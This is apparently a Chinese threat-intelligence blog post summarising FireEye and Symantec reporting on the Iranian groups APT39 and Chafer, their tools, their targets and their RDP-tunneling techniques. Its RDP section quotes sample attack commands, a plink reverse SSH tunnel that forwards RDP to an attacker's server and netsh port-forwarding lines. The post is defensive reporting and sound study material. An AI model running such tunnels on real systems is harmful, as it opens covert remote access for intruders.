APT39:专注窃取个人信息的伊朗APT组织披露,以及其所使用的RDP隧道通信技术简介

释放双眼,带上耳机,听听看~!

感谢大佬们的转发点赞和关注,您们的支持是我更新的动力,求转发

火眼在今日汇总区分了一个名为APT39的伊朗APT组织。

其目的是为了将该组织和Chafer组织区分开(和朝鲜lazarus和APT38情况差不多)

这个操作是不是似曾相似,没错,就是之前火眼命名的APT38组织,其为著名APT组织Lazarus的分支,专业针对金融行业进行攻击。

公众号链接: APT38组织:进行金融犯罪的朝鲜官方组织


话说既然火眼已经不是第一次汇总APT组织名称了,是不是我们也可以,嗯。


具体信息

组织名称:APT39

来源:伊朗国家队

目标:伊朗国内,其他中东国家或地区

活动时间:自2014年11月以来,持续行动,

活动目的:广泛窃取伊朗公民个人信息,以支持为伊朗国家优先事项提供服务的监控、跟踪或监视操作,或者可能创建额外的访问和载体以促进未来的活动。 

APT39是为了汇集其背后成员此前的活动和使用的攻击方法,其活动基本上与一个公开称为“Chafer(金龟子)”的组织保持一致。

为了不占前面排版,与Chafer的组织资料和IOC链接见文章最下面。顺便扯一句,从这个组织过去的攻击目标中,可以看到其针对多家中东航空公司进行了攻击,其目的90%是为了更进一步的监控一些目标人物的活动轨迹和更多的信息。


可以举一反三一下。

可能火眼是觉得该组织的公开报告的内容存在差异,下面为具体信息。

APT39主要利用SEAWEEDCACHEMONEY后门以及POWBAT特殊变种后门。

虽然APT39的目标范围是全球性的,但其活动主要集中在中东地区。

APT39优先考虑电信行业,并进一步瞄准旅游业和支持它的高科技行业的IT公司。

APT39所针对的国家和行业如下图所示。

涉及电信,高科技产业,政府,商业服务,交通,媒体与娱乐

图 APT39所针对的国家和行业

APT39对电信和旅游行业的关注表明,其意图针对特定个人进行监控,跟踪或监视操作,收集专有或客户数据用于商业或运营目的,以满足与国家优先事项相关的战略要求。

伊朗政府明确表明了其收集可能有利于民族国家决策的地缘政治数据的潜在意图

因此APT39的主要任务是跟踪或监控感兴趣的目标,收集个人信息(包括旅行路线)以及从电信公司收集客户数据

虽然APT39和APT34(OilRig)有一些相似之处,包括恶意软件分发方法,POWBAT后门使用,基础设施命名和目标重叠,但火眼认为APT39与APT34不同,因为它使用了不同的POWBAT变体。

同样,这些组织和朝鲜类似在某种程度上会进行协同工作或共享资源。

此外,APT39会使用各种自定义和公开可用的恶意软件和工具进行攻击。

攻击流程如下:

首先,APT39会利用带有恶意附件(和/或)超链接的钓鱼电子邮件,通常会drop POWBAT对目标主机进行感染。并且APT39会经常注册并利用伪装成合法Web服务的域名和与预期目标相关的组织的相关域名。

此外,该小组还定期识别并利用目标组织的存在漏洞的Web服务器来安装Web shell,例如ANTAK和ASPXSPY,并使用被盗的合法凭据来破坏面向外部的Outlook Web Access(OWA)资源,从而建立立足点,提权并内网渗透。

在得到权限后,APT39会利用SEAWEED,CACHEMONEY等定制后门以及POWBAT的独特变体来在目标环境中建立立足点。

在提权期间,除了Windows Credential Editor和ProcDump等合法工具外,还可以观察到其使用免费提供的工具,如Mimikatz和Ncrack。

内网渗透期间则会使用自定义脚本和免费提供的自定义工具(如端口扫描程序,BLUETORCH)进行横向移动。

APT39通过远程桌面协议(RDP),SSH,PsExec,RemCom和xCmdSvc等无数工具促进横向移动。

REDTRIP,PINKTRIP和BLUETRIP等自定义工具也被用于在受感染主机之间创建SOCKS5代理。

除了使用RDP进行横向移动外,APT39还使用此协议来维护受害环境中的持久性。为了完成其使命,APT39通常使用WinRAR或7-Zip等压缩工具压缩被盗数据并进行回传。

下图为具体汇总信息。

值得一提的是,APT39会重新打包Mimikatz从而绕过目标机器上的杀软检测。

APT39对电信和旅游行业的重要目标反映了其努力为了监控目标而收集关于目标和客户数据的个人信息,以便于未来更好的进行监视工作。

电信公司是有吸引力的目标,因为它们存储大量的个人和客户信息,提供对用于通信的关键基础设施的访问,并允许跨多个垂直行业访问各种潜在目标。

APT39的目标不仅代表了其对已知目标行业的威胁,而且还延伸到这些组织的客户群,其中包括全球范围内的各种行业和个人。

以上相关链接:

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html


可能是chafer之前都是针对航空公司,然后APT39主要是针对电信和旅游行业?因此新增一个名称?(大概)

而APT39这个名称不是第一次被火眼公开谈论过了,前几天火眼发出的报告<<通过RDP隧道绕过网络限制>>中,

火眼安全研究员Steve大兄弟(@stvemillertime)基于这个报告表示有多个组织使用了这个技术,使用Plink进行RDP隧道建立通信。

分别为

APT34, APT35, APT39, FIN1, FIN6, FIN7, FIN8 和 triton背后的组织

针对工控系统的TRITON入侵活动由俄罗斯研究所支持

这个RDP隧道(RDP, Remote Desktop Protocol)一文具体如下

用于隧道RDP会话的常用实用程序是PuTTY Link,通常称为Plink。

Plink可用于使用任意源和目标端口与其他系统建立安全shell(SSH)网络连接。

由于许多IT环境要么不执行协议检查,要么不阻止从其网络出站的SSH通信,因此FIN8等攻击者使用Plink创建加密隧道,会被允许通过受感染系统上的RDP端口与攻击者命令和控制进行通信(C2 )服务器。

示例如下:

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

使用Plink创建RDP隧道成功和从攻击者C2服务器到受害者的成功端口转发示例图。

还可以通过端口转发进行RDP隧道连接

示例如下:

示例netsh端口转发命令:

netsh interface portproxy add v4tov4 listenport = 8001 listenaddress = <JUMP BOX IP> connectport = 3389 connectaddress = <DESTINATION IP>

示例缩短的netsh端口转发命令:

netsh I pavl = 8001 listena = <JUMP BOX IP> connectp = 3389 c = <DESTINATION IP>

使用跳板通过RDP进行横向移动到其他网段

RDP协议握手情况

原文还谈及了如何基于网络和主机进行检测,有兴趣的可以看原文阅读一番。

相关链接:

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html


此前火眼另一篇文章也提到过这类技术

<<建立远程桌面协议的基准>>

下面这幅图就非常不错,涉及点和面很广,翻译一下又是一页PPT。

原文还对如何通过事件日志追踪RDP连接进行了讲解,感兴趣可以详细看一下。

相关链接

https://www.fireeye.com/blog/threat-research/2018/04/establishing-a-baseline-for-remote-desktop-protocol.html

更多情报敬请点击以下链接

点击这里加入知识星球:APT威胁情报平台

点个关注和好看吧,欢迎关注本公众号,

回复恭喜发财大吉大利,进**群交流,拒绝黑产进入。


资料如下:

Chafer:

这是我之前汇总的

伊朗Cadelle和Chafer组织具有关联性,他们一直在利用后门对国内和国际目标进行有针对性的监视。

虽然这些组织主要针对位于伊朗的个人,但他们也对中东地区的航空公司和电信提供商进行攻击,可能是为了监控目标的移动和通信。

 OilRig APT 组织使用的 C&C 服务器 IP 地址 83.142.230.138 与 Chafer 黑客组织使用的是一样的。同样具有关联性。


伊朗APT组织Chafer在2017年的攻击事件介绍

Chafer是一个在2015年被赛门铁克曝光的伊朗APT组织,该组织在2017年仍然保持活跃:攻击了中东地区9个新的目标组织(以色列,约旦,阿拉伯联合酋长国,沙特阿拉伯和土耳其的组织)。

Chafer袭击的目标行业主要为航空公司,飞机服务,IT服务,软件,通讯服务,工资服务,工程建设。

该组织在最新的工具包中增加了一批恶意Excel宏文档,该文档打开后首先会运行Powershell脚本下载三个文件,这三个文件分别为窃密程序,截屏程序和一个空的可执行程序。

其中窃密程序能够窃取剪贴板的内容,截取屏幕截图,记录键盘记录以及窃取文件和用户凭证。在此之后,Powershell脚本会陆陆续续下载新的恶意程序。

以下为2017年该组织涉及到的7种新工具:

Remcom:PsExec的开源替代品,它是用于在其他系统上执行进程的Microsoft Sysinternals工具。

NSSM:Windows服务管理器的开源替代品,可用于安装和删除服务,并在服务崩溃时重新启动服务。

自定义屏幕截图和剪贴板捕获工具。

SMB黑客工具:与其他工具一起使用来遍历目标网络。这些工具包括EternalBlue漏洞(之前由WannaCry和Petya使用)。

GNU HTTPTunnel:一种可在Linux计算机上创建双向HTTP隧道的开源工具,可能允许超出限制性防火墙的通信。

UltraVNC:用于Microsoft Windows的开源远程管理工具。

NBTScan:用于扫描IP网络以获取NetBIOS名称信息的免费工具。

Chafer还继续使用之前与该组织相关的工具,包括自己定制的后门Remexi,PsExec,Mimikatz, Pwdump 和PuTTY。

Chafer已经使用这些工具来遍历目标网络。该组织最近采用了NSSM来维护持久性,并在受感染计算机上安装运行Plink服务。然后使用Plink从攻击者的服务器向受害者计算机上的RDP端口打开反向SSH会话。因此可以使用RDP访问受感染的计算机。

一旦建立了立足点,攻击者就可以使用PsExec,Remcom和SMB黑客工具开始内网渗透。

[1]

https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

[2]

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

[3]

https://securityaffairs.co/wordpress/55145/apt/oilrig-apt-itan.html


你点的每个赞,我都认真当成了喜欢

本文源自微信公众号:黑鸟

人已赞赏
安全工具

真船借箭:盘点行动中攻击者的绝密武器

2019-10-16 10:09:45

安全工具

Atrient供应商袭击了披露其重大漏洞的安全研究员

2019-10-16 10:09:53

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索